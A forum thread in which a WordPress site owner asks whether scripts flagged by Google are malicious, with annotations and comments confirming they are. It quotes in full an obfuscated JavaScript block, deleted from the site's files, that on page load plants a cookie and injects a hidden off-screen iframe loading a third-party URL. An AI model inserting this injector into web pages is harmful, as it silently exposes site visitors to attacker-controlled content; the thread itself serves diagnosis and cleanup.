Malware on website hxxp looks suspicious

Google has detected a malicious file/malware on our website. I checked it with
redleg, and some of these values are displayed in yellow.

<!-- Reviewer note: the _wpcf7* names match the contact-form-7 plugin referenced in the
     script paths further down this post; these are the hidden bookkeeping fields that plugin
     emits with a form (form id, plugin version, locale, unit tag) plus a WordPress nonce.
     A display:none wrapper around hidden inputs is expected for this markup and is not by
     itself an indicator of injected content. -->
<div style=" display: none ;">
<input type="hidden" name="_wpcf7" value="41" />
<input type="hidden" name="_wpcf7_version" value="4.3" />
<input type="hidden" name="_wpcf7_locale" value="" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1" />
<input type="hidden" name="_wpnonce" value="649583a56e" />
  </div> 

PS. I have replaced our real links with "ourwebsite" here for security and privacy reasons.

<!-- Reviewer note: both src attributes point into the contact-form-7 plugin directory on the
     site's own host, and the inline block only defines the _wpcf7 settings object (loader image
     URL and a "Sending ..." label). Nothing in these tags references another host. That says
     nothing about the contents of the referenced .js files: the poster reports finding the
     injected block inside .js files, so the files themselves are what needs checking. -->
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=52e4c650d67bb1484c4a926e5a0eccaf-2014.06.20'> < / sc?ript >
 < sc?ript type='text/javascript'>
 /* < ![CDATA[ */
 var _wpcf7 = {"loaderUrl":"http://ourwebsite.com/wp-content/plugins/contact-form-7/images/ajax-loader.gif","sending":"Sending ..."};
 /* ]]> */
 < / sc?ript >
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=52e4c650d67bb1484c4a926e5a0eccaf'> < / sc?ript >

Can someone tell me if these scripts look malicious?

What I did was delete the following script from all my .js files:

 /*dd58e691432e362d70bf5b7534f31b87*/
 /*
  * Reviewer notes on the quoted sample (the code below is left exactly as posted).
  *
  * - The entries of _0xacbd look like \xNN hex escapes whose backslashes were lost when the
  *   post was rendered, so the block as shown here would not run as intended; read each
  *   "xNN" as one byte. Decoded, the table holds ordinary DOM names plus a few payload strings:
  *     [0] onload   [3] cookie   [14] createElement   [17] innerHTML   [20] appendChild   [21] body
  *     [11] ad-cookie   [12] er2vdr5gdc3ds
  *     [15] hxxp://stats[.]balw5ezvicz7hka[.]pw/?id=6947627&keyword=   (defanged)
  *     [16] &ad_id=Xn5be4
  *     [18] <div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='
  *     [19] '></iframe></div>
  * - window.onload is replaced with a handler that reads the "ad-cookie" cookie. If its value is
  *   not [12], it sets that cookie with an expiry one day ahead and appends to document.body a
  *   div whose innerHTML is [18] + URL + [19], where URL = [15] + 983755 + [16].
  * - Net effect: an iframe positioned off-screen that loads a third-party URL, shown to a given
  *   browser again only after the cookie expires. A repeat visit with the cookie still set will
  *   not reproduce it, so verify a cleanup with cookies cleared.
  * - Detection: the identical 32-hex-character comment on the line before and after the payload
  *   and the _0xacbd identifier are both usable search strings for finding other infected files.
  *   Deleting the block does not explain how the files were modified; this page does not show
  *   that, and it has to be found and closed separately.
  */
 var _0xacbd=["x6Fx6Ex6Cx6Fx61x64","x67x65x74x44x61x74x65","x73x65x74x44x61x74x65","x63x6Fx6Fx6Bx69x65","x3D","x3Bx20x65x78x70x69x72x65x73x3D","x74x6Fx55x54x43x53x74x72x69x6Ex67","","x3Dx28x5Bx5Ex3Bx5Dx29x7Bx31x2Cx7D","x65x78x65x63","x73x70x6Cx69x74","x61x64x2Dx63x6Fx6Fx6Bx69x65","x65x72x32x76x64x72x35x67x64x63x33x64x73","x64x69x76","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x68x74x74x70x3Ax2Fx2Fx73x74x61x74x73x2Ex62x61x6Cx77x35x65x7Ax76x69x63x7Ax37x68x6Bx61x2Ex70x77x2Fx3Fx69x64x3Dx36x39x34x37x36x32x37x26x6Bx65x79x77x6Fx72x64x3D","x26x61x64x5Fx69x64x3Dx58x6Ex35x62x65x34","x69x6Ex6Ex65x72x48x54x4Dx4C","x3Cx64x69x76x20x73x74x79x6Cx65x3Dx27x70x6Fx73x69x74x69x6Fx6Ex3Ax61x62x73x6Fx6Cx75x74x65x3Bx7Ax2Dx69x6Ex64x65x78x3Ax31x30x30x30x3Bx74x6Fx70x3Ax2Dx31x30x30x30x70x78x3Bx6Cx65x66x74x3Ax2Dx39x39x39x39x70x78x3Bx27x3Ex3Cx69x66x72x61x6Dx65x20x73x72x63x3Dx27","x27x3Ex3Cx2Fx69x66x72x61x6Dx65x3Ex3Cx2Fx64x69x76x3E","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79"];window[_0xacbd[0]]=function(){function _0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= new Date();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_0xacbd[1]]()+_0x78a6x4);};if(_0x78a6x2&&_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd[6]]():_0xacbd[7])}else {return false};}function _0x78a6x6(_0x78a6x2){var _0x78a6x3= new RegExp(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[_0xacbd[3]]);if(_0x78a6x4){_0x78a6x4=_0x78a6x4[0][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd[11]);if(_0x78a6x7!=_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var _0x78a6x8=document[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=983755;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]]=_0xacbd[18]+_0x78a6xa+_0xacbd[19];document[_0xacbd[21]][_0xacbd[20]](_0x78a6x8);};};
 /*dd58e691432e362d70bf5b7534f31b87*/


3 comments

  1. My antivirus (ESET Endpoint Security 5.0.2) detects the JavaScript `var` block above as a Trojan and refuses to load this page while it is enabled. That’s a pretty good sign that this is indeed a bad code block.

    So to answer your query, yes, the code you posted is indeed malicious.

  2. I downloaded Anti-Malware Security and Brute-Force Firewall, and now the threat has disappeared, although something still remains, but on another URL, which is

    but these two only redirect the page to the main page..

    PS. I have backups stored on the FTP server that were taken before the cleanup. Should I delete them as well, or is it fine as long as they aren’t running?
